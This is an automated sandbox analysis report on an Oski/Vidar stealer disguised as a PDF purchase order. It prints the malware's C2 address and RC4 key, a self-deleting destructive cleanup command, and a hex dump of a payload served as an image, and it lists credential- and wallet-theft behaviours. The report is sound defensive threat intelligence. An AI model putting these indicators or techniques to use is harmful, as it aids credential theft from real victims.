Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report New Order PO2193570O1.pdf.exe

Overview

General Information

Sample Name:New Order PO2193570O1.pdf.exe
Analysis ID:433019
MD5:328733d92332e282737f4d92ca3b4a27
SHA1:80b6e47d3701b7f5173e87303f21fa3f9fdbf42a
SHA256:a9e2f90e66d12cacb7a8b02ea3a352a1d0fd7b9e09e4a24dfaa53932fcfcff19
Tags:exeOskiStealer
Infos:

Most interesting Screenshot:

Detection

Oski Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Sigma detected: Suspicious Double Extension
Yara detected Oski Stealer
Yara detected Vidar stealer
Downloads files with wrong headers with respect to MIME Content-Type
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Posts data to a JPG file (protocol mismatch)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
Is looking for software installed on the system
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • New Order PO2193570O1.pdf.exe (PID: 1004 cmdline: 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe' MD5: 328733D92332E282737F4D92CA3B4A27)
    • New Order PO2193570O1.pdf.exe (PID: 1124 cmdline: 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe' MD5: 328733D92332E282737F4D92CA3B4A27)
      • cmd.exe (PID: 5360 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /pid 1124 & erase C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe & RD /S /Q C:\\ProgramData\\300337377349991\\* & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5916 cmdline: taskkill /pid 1124 MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup

Malware Configuration

Threatname: Oski

{"C2 url": "51.222.56.151/tsc/", "RC4 Key": "056139954853430408"}

Threatname: Vidar

{"Config": ["00000000 -> System ---------------------------------------------------", "Windows: Windows 10 Pro", "Bit: x64", "User: user", "Computer Name: 066656", "System Language: en-US", "Machine ID: d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}", "Domain Name: Unknown", "Workgroup: EEGWXUH", "Keyboard Languages: English (United States)", "Hardware -------------------------------------------------", "Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Logical processors: 4", "Videocard: Microsoft Basic Display Adapter", "Display: 1280x1024", "RAM: 8191 MB", "Laptop: No", "Time -----------------------------------------------------", "Local: 11/6/2021 6:32:4", "Zone: UTC-8", "Network --------------------------------------------------", "IP: IP?", "Country: Country?", "Installed Softwrare --------------------------------------", "Google Chrome 85.0.4183.121", "Microsoft Office Professional Plus 2016 16.0.4266.1001", "Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0", "Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005", "Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 10.0.30319", "Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 14.21.27702", "Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 14.21.27702", "Java 8 Update 211 8.0.2110.12", "Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0", "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 14.21.27702.2", "Java Auto Updater 2.8.211.12", "Google Update Helper 1.3.35.451", "Microsoft Office Professional Plus 2016 16.0.4266.1001", "Security Update for Microsoft Office 2016 (KB3114690) 32-Bit Edition", "Update for Microsoft Office 2016 (KB2920712) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3141456) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3115081) 32-Bit Edition", "Update for Microsoft Office 2016 (KB2920717) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3114852) 32-Bit Edition", "Update for Microsoft Office 2016 (KB2920720) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4022161) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB3128012) 32-Bit Edition", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition", "Security Update for Microsoft PowerPoint 2016 (KB4484246) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3118263) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4022176) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3114528) 32-Bit Edition", "Security Update for Microsoft Visio 2016 (KB4484244) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4484287) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3118262) 32-Bit Edition", "Update for Skype for Business 2016 (KB4484286) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4484214) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4011574) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3213650) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4462119) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4032236) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB3085538) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4484138) 32-Bit Edition", "Definition Update for Microsoft Office 2016 (KB3115407) 32-Bit Edition", "Update for Microsoft Office 2016 (KB2920678) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4475580) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4484248) 32-Bit Edition", "Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit Edition", "Security Update for Microsoft Publisher 2016 (KB4011097) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4464586) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4461435) 32-Bit Edition", "Security Update for Microsoft Outlook 2016 (KB4484274) 32-Bit Edition", "Security Update for Microsoft Project 2016 (KB4484269) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3191929) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4011259) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4464535) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB2920727) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3114903) 32-Bit Edition", "Update for Microsoft Office 2016 (KB2920724) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4484101) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3118264) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4011629) 32-Bit Edition", "Security Update for Microsoft Access 2016 (KB4484167) 32-Bit Edition", "Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4032254) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4011225) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4484106) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4022193) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4011634) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4484258) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3178666) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4011669) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4475588) 32-Bit Edition", "Update for Microsoft OneNote 2016 (KB4475586) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB3213551) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4484145) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3115276) 32-Bit Edition", "Microsoft Access MUI (English) 2016 16.0.4266.1001", "Microsoft Excel MUI (English) 2016 16.0.4266.1001", "Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4011629) 32-Bit Edition", "Microsoft PowerPoint MUI (English) 2016 16.0.4266.1001", "Security Update for Microsoft PowerPoint 2016 (KB4484246) 32-Bit Edition", "Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit Edition", "Microsoft Publisher MUI (English) 2016 16.0.4266.1001", "Security Update for Microsoft Publisher 2016 (KB4011097) 32-Bit Edition", "Microsoft Outlook MUI (English) 2016 16.0.4266.1001", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition", "Security Update for Microsoft Outlook 2016 (KB4484274) 32-Bit Edition", "Microsoft Word MUI (English) 2016 16.0.4266.1001", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition", "Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit Edition", "Microsoft Office Proofing Tools 2016 - English 16.0.4266.1001", "Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition", "Outils de v", "00001965 -> rification linguistique 2016 de Microsoft Office", "00001996 -> - Fran", "0000199d -> ais 16.0.4266.1001", "Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition", "Herramientas de correcci", "00001a07 -> n de Microsoft Office 2016: espa", "00001a28 -> ol 16.0.4266.1001", "Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3114528) 32-Bit Edition", "Update for Skype for Business 2016 (KB4484286) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3213650) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4462119) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB3085538) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4022162) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4484248) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4464586) 32-Bit Edition", "Security Update for Microsoft Project 2016 (KB4484269) 32-Bit Edition", "Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4484106) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4011634) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4475588) 32-Bit Edition", "Update for Microsoft OneNote 2016 (KB4475586) 32-Bit Edition", "Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition", "Microsoft Office Proofing (English) 2016 16.0.4266.1001", "Microsoft InfoPath MUI (English) 2016 16.0.4266.1001", "Microsoft Office Shared MUI (English) 2016 16.0.4266.1001", "Security Update for Microsoft Office 2016 (KB4022176) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4484214) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4011574) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4475580) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4484106) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB3213551) 32-Bit Edition", "Microsoft DCF MUI (English) 2016 16.0.4266.1001", "Microsoft OneNote MUI (English) 2016 16.0.4266.1001", "Update for Microsoft OneNote 2016 (KB4475586) 32-Bit Edition", "Microsoft Groove MUI (English) 2016 16.0.4266.1001", "Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition", "Microsoft Office OSM MUI (English) 2016 16.0.4266.1001", "Microsoft Office OSM UX MUI (English) 2016 16.0.4266.1001", "Microsoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001", "Microsoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001", "Microsoft Skype for Business MUI (English) 2016 16.0.4266.1001", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition", "Update for Skype for Business 2016 (KB4484286) 32-Bit Edition", "Adobe Acrobat Reader DC 19.012.20035", "Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030", "Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030", "Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0", "Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 14.21.27702.2", "Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0", "Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 12.0.21005"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmpJoeSecurity_OskiYara detected Oski StealerJoe Security
    00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmpJoeSecurity_OskiYara detected Oski StealerJoe Security
      00000000.00000002.204106887.0000000009830000.00000004.00000001.sdmpJoeSecurity_OskiYara detected Oski StealerJoe Security
        Process Memory Space: New Order PO2193570O1.pdf.exe PID: 1124JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.1.New Order PO2193570O1.pdf.exe.400000.0.unpackJoeSecurity_OskiYara detected Oski StealerJoe Security
            0.2.New Order PO2193570O1.pdf.exe.9830000.4.raw.unpackJoeSecurity_OskiYara detected Oski StealerJoe Security
              1.1.New Order PO2193570O1.pdf.exe.400000.0.raw.unpackJoeSecurity_OskiYara detected Oski StealerJoe Security
                0.2.New Order PO2193570O1.pdf.exe.9830000.4.unpackJoeSecurity_OskiYara detected Oski StealerJoe Security
                  1.2.New Order PO2193570O1.pdf.exe.400000.0.raw.unpackJoeSecurity_OskiYara detected Oski StealerJoe Security
                    Click to see the 1 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Double ExtensionShow sources
                    Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe' , CommandLine: 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe' , CommandLine|base64offset|contains: :^, Image: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe, NewProcessName: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe, OriginalFileName: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe' , ParentImage: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe, ParentProcessId: 1004, ProcessCommandLine: 'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe' , ProcessId: 1124

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 1.1.New Order PO2193570O1.pdf.exe.400000.0.raw.unpackMalware Configuration Extractor: Oski {"C2 url": "51.222.56.151/tsc/", "RC4 Key": "056139954853430408"}
                    Source: system.txt.1.dr.binstrMalware Configuration Extractor: Vidar {"Config": ["00000000 -> System ---------------------------------------------------", "Windows: Windows 10 Pro", "Bit: x64", "User: user", "Computer Name: 066656", "System Language: en-US", "Machine ID: d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}", "Domain Name: Unknown", "Workgroup: EEGWXUH", "Keyboard Languages: English (United States)", "Hardware -------------------------------------------------", "Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Logical processors: 4", "Videocard: Microsoft Basic Display Adapter", "Display: 1280x1024", "RAM: 8191 MB", "Laptop: No", "Time -----------------------------------------------------", "Local: 11/6/2021 6:32:4", "Zone: UTC-8", "Network --------------------------------------------------", "IP: IP?", "Country: Country?", "Installed Softwrare --------------------------------------", "Google Chrome 85.0.4183.121", "Microsoft Office Professional Plus 2016 16.0.4266.1001", "Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0", "Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005", "Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 10.0.30319", "Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 14.21.27702", "Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 14.21.27702", "Java 8 Update 211 8.0.2110.12", "Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0", "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 14.21.27702.2", "Java Auto Updater 2.8.211.12", "Google Update Helper 1.3.35.451", "Microsoft Office Professional Plus 2016 16.0.4266.1001", "Security Update for Microsoft Office 2016 (KB3114690) 32-Bit Edition", "Update for Microsoft Office 2016 (KB2920712) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3141456) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3115081) 32-Bit Edition", "Update for Microsoft Office 2016 (KB2920717) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3114852) 32-Bit Edition", "Update for Microsoft Office 2016 (KB2920720) 32-Bit Edition", "Update for Microsoft Office 2016 (KB4022161) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB3128012) 32-Bit Edition", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition", "Security Update for Microsoft PowerPoint 2016 (KB4484246) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3118263) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4022176) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3114528) 32-Bit Edition", "Security Update for Microsoft Visio 2016 (KB4484244) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4484287) 32-Bit Edition", "Update for Microsoft Office 2016 (KB3118262) 32-Bit Edition", "Update for Skype for Business 2016 (KB4484286) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4484214) 32-Bit Edition", "Security Update for Microsoft Office 2016 (KB4011574)
                    Machine Learning detection for sampleShow sources
                    Source: New Order PO2193570O1.pdf.exeJoe Sandbox ML: detected
                    Source: 0.2.New Order PO2193570O1.pdf.exe.9830000.4.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041CB10 CryptUnprotectData,LocalAlloc,LocalFree,1_2_0041CB10
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041C900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,1_2_0041C900
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041CBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_0041CBA0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041CD30 _malloc,_malloc,CryptUnprotectData,1_2_0041CD30
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041EED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_0041EED0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_0041CB10 CryptUnprotectData,1_1_0041CB10

                    Compliance:

                    barindex
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeUnpacked PE file: 1.2.New Order PO2193570O1.pdf.exe.400000.0.unpack
                    Source: New Order PO2193570O1.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: New Order PO2193570O1.pdf.exe, 00000001.00000003.205443188.0000000002981000.00000004.00000001.sdmp, freebl3.dll.1.dr
                    Source: Binary string: vcruntime140.i386.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.211718078.0000000002987000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: New Order PO2193570O1.pdf.exe, 00000001.00000003.211718078.0000000002987000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: New Order PO2193570O1.pdf.exe, 00000001.00000003.207427996.0000000002981000.00000004.00000001.sdmp, msvcp140.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.206441558.0000000002981000.00000004.00000001.sdmp, mozglue.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: New Order PO2193570O1.pdf.exe, 00000001.00000003.202762418.0000000002981000.00000004.00000001.sdmp, softokn3.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: New Order PO2193570O1.pdf.exe, 00000001.00000003.206441558.0000000002981000.00000004.00000001.sdmp, mozglue.dll.1.dr
                    Source: Binary string: wntdll.pdbUGP source: New Order PO2193570O1.pdf.exe, 00000000.00000003.200028256.0000000009A40000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdb source: New Order PO2193570O1.pdf.exe, 00000000.00000003.200028256.0000000009A40000.00000004.00000001.sdmp
                    Source: Binary string: msvcp140.i386.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.207427996.0000000002981000.00000004.00000001.sdmp, msvcp140.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
                    Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: New Order PO2193570O1.pdf.exe, 00000001.00000003.205443188.0000000002981000.00000004.00000001.sdmp, freebl3.dll.1.dr
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,1_2_004043DF
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,1_2_00420540
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,1_2_0041E640
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,1_2_0041D360
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_2_0041F6B0 FindFirstFileExW,1_2_0041F6B0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,1_1_004043DF
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_00420540 FindFirstFileA,DeleteFileA,FindNextFileA,1_1_00420540
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_0041E640 FindFirstFileA,FindNextFileA,FindClose,1_1_0041E640
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 1_1_0041F6B0 FindFirstFileExW,1_1_0041F6B0
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 4x nop then add esp, 04h1_2_00423050
                    Source: C:\Users\user\Desktop\New Order PO2193570O1.pdf.exeCode function: 4x nop then add esp, 04h1_1_00423050

                    Networking:

                    barindex
                    Downloads files with wrong headers with respect to MIME Content-TypeShow sources
                    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Fri, 11 Jun 2021 04:31:59 GMT Content-Type: image/jpeg Content-Length: 144848 Connection: keep-alive Keep-Alive: timeout=60 Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT ETag: "235d0-58a9fc6206c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 